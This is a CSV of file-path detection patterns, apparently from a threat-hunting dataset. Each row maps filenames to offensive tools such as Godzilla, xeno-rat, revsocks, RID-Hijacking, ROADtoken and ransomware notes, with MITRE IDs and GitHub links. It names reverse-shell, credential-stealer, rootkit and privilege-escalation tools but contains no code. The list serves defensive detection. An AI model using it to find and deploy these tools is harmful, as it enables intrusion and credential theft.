"*\reverse64.bin*",".{0,1000}\\reverse64\.bin.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","0","N/A","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","18042"
"*\ReverseProxy.dll*",".{0,1000}\\ReverseProxy\.dll.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","18043"
"*\ReverseShell.ahk*",".{0,1000}\\ReverseShell\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","18044"
"*\reverse-shellcode.cpp*",".{0,1000}\\reverse\-shellcode\.cpp.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","N/A","10","9","804","128","2024-07-02T10:24:43Z","2023-04-08T16:29:52Z","18045"
"*\reverse-ssh\*",".{0,1000}\\reverse\-ssh\\.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","18046"
"*\revil1.txt*",".{0,1000}\\revil1\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","18047"
"*\revil2.txt*",".{0,1000}\\revil2\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","18048"
"*\revil3.txt*",".{0,1000}\\revil3\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","18049"
"*\RevlCmd.dll*",".{0,1000}\\RevlCmd\.dll.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","0","N/A","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","18050"
"*\revshell.ps1*",".{0,1000}\\revshell\.ps1.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","18052"
"*\revshell.ps1*",".{0,1000}\\revshell\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","18053"
"*\revshell.py*",".{0,1000}\\revshell\.py.{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","0","N/A","N/A","3","10","29","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z","18054"
"*\revshell32.bin*",".{0,1000}\\revshell32\.bin.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","18055"
"*\revshell64.bin*",".{0,1000}\\revshell64\.bin.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","18056"
"*\revsocks.exe*",".{0,1000}\\revsocks\.exe.{0,1000}","offensive_tool_keyword","revsocks","Cross-platform SOCKS5 proxy server program/library written in C that can also reverse itself over a firewall.","T1572 - T1090 - T1071","TA0001  - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/emilarner/revsocks","1","0","N/A","https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/iran-apt-seedworm-africa-telecoms","10","10","31","4","2022-08-08T07:59:16Z","2022-03-29T22:12:18Z","18057"
"*\revsocks.exe*",".{0,1000}\\revsocks\.exe.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001  - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/kost/revsocks","1","0","N/A","N/A","10","10","358","47","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z","18058"
"*\revsocks\*.go*",".{0,1000}\\revsocks\\.{0,1000}\.go.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001  - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/kost/revsocks","1","0","N/A","N/A","10","10","358","47","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z","18059"
"*\revsocks\make.bat*",".{0,1000}\\revsocks\\make\.bat.{0,1000}","offensive_tool_keyword","revsocks","Cross-platform SOCKS5 proxy server program/library written in C that can also reverse itself over a firewall.","T1572 - T1090 - T1071","TA0001  - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/emilarner/revsocks","1","0","N/A","https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/iran-apt-seedworm-africa-telecoms","10","10","31","4","2022-08-08T07:59:16Z","2022-03-29T22:12:18Z","18060"
"*\revsocks-master\*",".{0,1000}\\revsocks\-master\\.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001  - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/kost/revsocks","1","0","N/A","N/A","10","10","358","47","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z","18061"
"*\RFNCW-DECRYPT.txt*",".{0,1000}\\RFNCW\-DECRYPT\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","18062"
"*\rfs_injection.exe*",".{0,1000}\\rfs_injection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","18063"
"*\rid_hijack.py*",".{0,1000}\\rid_hijack\.py.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","0","N/A","N/A","9","2","174","43","2024-11-20T01:43:01Z","2018-07-14T18:48:51Z","18065"
"*\rid_hijack.py*",".{0,1000}\\rid_hijack\.py.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","18066"
"*\rid_hijack.rb*",".{0,1000}\\rid_hijack\.rb.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","0","N/A","N/A","9","2","174","43","2024-11-20T01:43:01Z","2018-07-14T18:48:51Z","18067"
"*\RID-Hijacking\*",".{0,1000}\\RID\-Hijacking\\.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","0","N/A","N/A","9","2","174","43","2024-11-20T01:43:01Z","2018-07-14T18:48:51Z","18068"
"*\RID-Hijacking-master*",".{0,1000}\\RID\-Hijacking\-master.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","0","N/A","N/A","9","2","174","43","2024-11-20T01:43:01Z","2018-07-14T18:48:51Z","18069"
"*\Risen_Guide.hta*",".{0,1000}\\Risen_Guide\.hta.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","18070"
"*\Risen_Guide2.hta*",".{0,1000}\\Risen_Guide2\.hta.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","18071"
"*\Risen_Note.txt*",".{0,1000}\\Risen_Note\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","18072"
"*\rm_injection.exe*",".{0,1000}\\rm_injection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","18073"
"*\ROADToken.csproj*",".{0,1000}\\ROADToken\.csproj.{0,1000}","offensive_tool_keyword","ROADtoken","Abusing Azure AD SSO with the Primary Refresh Token - ROADtoken is a tool that uses the BrowserCore.exe binary to obtain a cookie that can be used with SSO and Azure AD","T1557 - T1078 - T1071.001 - T1552.001","TA0006 ","N/A","N/A","Credential Access","https://github.com/dirkjanm/ROADtoken","1","0","N/A","N/A","7","1","89","17","2020-09-30T16:18:47Z","2020-07-21T12:42:14Z","18078"
"*\ROADToken.exe*",".{0,1000}\\ROADToken\.exe.{0,1000}","offensive_tool_keyword","ROADtoken","Abusing Azure AD SSO with the Primary Refresh Token - ROADtoken is a tool that uses the BrowserCore.exe binary to obtain a cookie that can be used with SSO and Azure AD","T1557 - T1078 - T1071.001 - T1552.001","TA0006 ","N/A","N/A","Credential Access","https://github.com/dirkjanm/ROADtoken","1","0","N/A","N/A","7","1","89","17","2020-09-30T16:18:47Z","2020-07-21T12:42:14Z","18079"
"*\ROADToken.sln*",".{0,1000}\\ROADToken\.sln.{0,1000}","offensive_tool_keyword","ROADtoken","Abusing Azure AD SSO with the Primary Refresh Token - ROADtoken is a tool that uses the BrowserCore.exe binary to obtain a cookie that can be used with SSO and Azure AD","T1557 - T1078 - T1071.001 - T1552.001","TA0006 ","N/A","N/A","Credential Access","https://github.com/dirkjanm/ROADtoken","1","0","N/A","N/A","7","1","89","17","2020-09-30T16:18:47Z","2020-07-21T12:42:14Z","18080"
"*\ROADtoken\bin\*",".{0,1000}\\ROADtoken\\bin\\.{0,1000}","offensive_tool_keyword","Maestro","Maestro is a post-exploitation tool that simplifies interaction with Intune/EntraID from a C2 agent on a user's workstation bypassing the need for user password knowledge - token manipulation or Azure authentication processes","T1550.004 - T1078 - T1087 - T1071 - T1102","TA0006 - TA0003 - TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/Maestro","1","0","N/A","behavior detections opportunities here https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30","9","4","333","33","2025-02-11T23:02:00Z","2024-01-15T18:45:50Z","18081"
"*\ROADtools\*",".{0,1000}\\ROADtools\\.{0,1000}","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","APT29 - COZY BEAR - Black Basta","Exploitation tool","https://github.com/dirkjanm/ROADtools","1","0","N/A","network exploitation tool","10","10","2126","295","2025-04-17T18:55:20Z","2020-03-28T09:56:08Z","18082"
"*\roaster.py*",".{0,1000}\\roaster\.py.{0,1000}","offensive_tool_keyword","RITM","python Man in the middle ","T1557.002 - T1040 - T1098.002 - T1557.001 - T1552.001","TA0006 - TA0007 - TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/Tw1sm/RITM","1","0","N/A","N/A","9","3","292","27","2024-11-20T14:27:24Z","2022-10-05T01:10:33Z","18083"
"*\Roblox Cookies.txt*",".{0,1000}\\Roblox\sCookies\.txt.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","N/A","10","","N/A","","","","18084"
"*\roblox cookies.txt*",".{0,1000}\\roblox\scookies\.txt.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","0","N/A","N/A","10","","N/A","","","","18085"
"*\roboform\app\getCredsroboformapp.h*",".{0,1000}\\roboform\\app\\getCredsroboformapp\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","18086"
"*\roboform\app\getCredsroboformapp2.h*",".{0,1000}\\roboform\\app\\getCredsroboformapp2\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","18087"
"*\roboform\app\getCredsroboformapp3.h*",".{0,1000}\\roboform\\app\\getCredsroboformapp3\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","18088"
"*\roboform\plugin\getCredsroboformplugin.h*",".{0,1000}\\roboform\\plugin\\getCredsroboformplugin\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","18089"
"*\RogueOxidResolver.cpp*",".{0,1000}\\RogueOxidResolver\.cpp.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","N/A","10","10","1382","215","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z","18090"
"*\RogueWinRM.sln*",".{0,1000}\\RogueWinRM\.sln.{0,1000}","offensive_tool_keyword","RogueWinRM","RogueWinRM is a local privilege escalation exploit that allows to escalate from a Service account (with SeImpersonatePrivilege) to Local System account if WinRM service is not running","T1548.003 - T1134.002 - T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RogueWinRM","1","0","N/A","N/A","10","8","788","107","2020-02-23T19:26:41Z","2019-12-02T22:58:03Z","18091"
"*\RogueWinRM\*",".{0,1000}\\RogueWinRM\\.{0,1000}","offensive_tool_keyword","RogueWinRM","RogueWinRM is a local privilege escalation exploit that allows to escalate from a Service account (with SeImpersonatePrivilege) to Local System account if WinRM service is not running","T1548.003 - T1134.002 - T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RogueWinRM","1","0","N/A","N/A","10","8","788","107","2020-02-23T19:26:41Z","2019-12-02T22:58:03Z","18092"
"*\Root\InventoryApplicationFile\defender-control*",".{0,1000}\\Root\\InventoryApplicationFile\\defender\-control.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#registry","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","18094"
"*\Root\InventoryApplicationFile\reghivebackup*",".{0,1000}\\Root\\InventoryApplicationFile\\reghivebackup.{0,1000}","offensive_tool_keyword","RegHiveBackup","backup the Registry files on your system into the specified folder","T1012 - T1596 - T1003","TA0006 - TA0009","N/A","N/A","Collection","https://www.nirsoft.net/alpha/reghivebackup.zip","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","18096"
"*\Rootkit.cpp*",".{0,1000}\\Rootkit\.cpp.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","N/A","N/A","N/A","9","899","186","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z","18100"
"*\rootkit.dll*",".{0,1000}\\rootkit\.dll.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","0","N/A","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","18101"
"*\ROT Shellcode Encoder.csproj*",".{0,1000}\\ROT\sShellcode\sEncoder\.csproj.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","18102"
"*\rotateproxy.exe*",".{0,1000}\\rotateproxy\.exe.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","N/A","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","18103"
"*\rotateproxy.service*",".{0,1000}\\rotateproxy\.service.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","N/A","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","18104"
"*\rotateproxy_*.zip*",".{0,1000}\\rotateproxy_.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","N/A","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","18105"
"*\rotateproxy-windows*",".{0,1000}\\rotateproxy\-windows.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","N/A","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","18106"
"*\RottenPotatoNG-main*",".{0,1000}\\RottenPotatoNG\-main.{0,1000}","offensive_tool_keyword","RottenPotatoNG","perform the RottenPotato attack and get a handle to a privileged token","T1134.001 - T1055.012 - T1547.001","TA0004","N/A","Sandworm","Privilege Escalation","https://github.com/breenmachine/RottenPotatoNG","1","0","N/A","N/A","8","10","935","183","2017-12-29T14:38:47Z","2017-12-29T13:19:03Z","18107"
"*\RottenPotatoNG-master*",".{0,1000}\\RottenPotatoNG\-master.{0,1000}","offensive_tool_keyword","RottenPotatoNG","perform the RottenPotato attack and get a handle to a privileged token","T1134.001 - T1055.012 - T1547.001","TA0004","N/A","Sandworm","Privilege Escalation","https://github.com/breenmachine/RottenPotatoNG","1","0","N/A","N/A","8","10","935","183","2017-12-29T14:38:47Z","2017-12-29T13:19:03Z","18108"
"*\Rottie3 Rmote Admin\*",".{0,1000}\\Rottie3\sRmote\sAdmin\\.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","18109"
"*\Rottie3.exe*",".{0,1000}\\Rottie3\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","18110"
"*\Routerscan.7z*",".{0,1000}\\Routerscan\.7z.{0,1000}","offensive_tool_keyword","RouterScan","a penetration testing tool to maliciously scan for and brute force routers - cameras and network-attached storage devices with web interfaces","T1110","TA0006 - TA0007","RouterScan","Conti","Credential Access","https://github.com/mustafashykh/router-scan","1","0","N/A","N/A","8","1","83","44","2019-02-24T14:31:16Z","2019-02-24T07:52:22Z","18111"
"*\RouterScan.exe*",".{0,1000}\\RouterScan\.exe.{0,1000}","offensive_tool_keyword","RouterScan","a penetration testing tool to maliciously scan for and brute force routers - cameras and network-attached storage devices with web interfaces","T1110","TA0006 - TA0007","RouterScan","Conti","Credential Access","https://github.com/mustafashykh/router-scan","1","0","N/A","N/A","8","1","83","44","2019-02-24T14:31:16Z","2019-02-24T07:52:22Z","18112"
"*\RouterScan.log*",".{0,1000}\\RouterScan\.log.{0,1000}","offensive_tool_keyword","RouterScan","a penetration testing tool to maliciously scan for and brute force routers - cameras and network-attached storage devices with web interfaces","T1110","TA0006 - TA0007","RouterScan","Conti","Credential Access","https://github.com/mustafashykh/router-scan","1","0","N/A","N/A","8","1","83","44","2019-02-24T14:31:16Z","2019-02-24T07:52:22Z","18113"
"*\RPC Backdoor.sln*",".{0,1000}\\RPC\sBackdoor\.sln.{0,1000}","offensive_tool_keyword","RPC-Backdoor","A basic emulation of an ""RPC Backdoor""","T1071.004","TA0011","N/A","N/A","C2","https://github.com/eladshamir/RPC-Backdoor","1","0","N/A","N/A","10","10","240","45","2022-08-25T14:37:41Z","2022-08-16T13:12:05Z","18114"
"*\RPC-Backdoor\*",".{0,1000}\\RPC\-Backdoor\\.{0,1000}","offensive_tool_keyword","RPC-Backdoor","A basic emulation of an ""RPC Backdoor""","T1071.004","TA0011","N/A","N/A","C2","https://github.com/eladshamir/RPC-Backdoor","1","0","N/A","N/A","10","10","240","45","2022-08-25T14:37:41Z","2022-08-16T13:12:05Z","18122"
"*\RPC-Backdoor_v1.0.7z*",".{0,1000}\\RPC\-Backdoor_v1\.0\.7z.{0,1000}","offensive_tool_keyword","RPC-Backdoor","A basic emulation of an ""RPC Backdoor""","T1071.004","TA0011","N/A","N/A","C2","https://github.com/eladshamir/RPC-Backdoor","1","0","N/A","N/A","10","10","240","45","2022-08-25T14:37:41Z","2022-08-16T13:12:05Z","18123"
"*\RPC-Backdoor_v1.0.zip*",".{0,1000}\\RPC\-Backdoor_v1\.0\.zip.{0,1000}","offensive_tool_keyword","RPC-Backdoor","A basic emulation of an ""RPC Backdoor""","T1071.004","TA0011","N/A","N/A","C2","https://github.com/eladshamir/RPC-Backdoor","1","0","N/A","N/A","10","10","240","45","2022-08-25T14:37:41Z","2022-08-16T13:12:05Z","18124"
"*\RPC-Backdoor-main*",".{0,1000}\\RPC\-Backdoor\-main.{0,1000}","offensive_tool_keyword","RPC-Backdoor","A basic emulation of an ""RPC Backdoor""","T1071.004","TA0011","N/A","N/A","C2","https://github.com/eladshamir/RPC-Backdoor","1","0","N/A","N/A","10","10","240","45","2022-08-25T14:37:41Z","2022-08-16T13:12:05Z","18125"
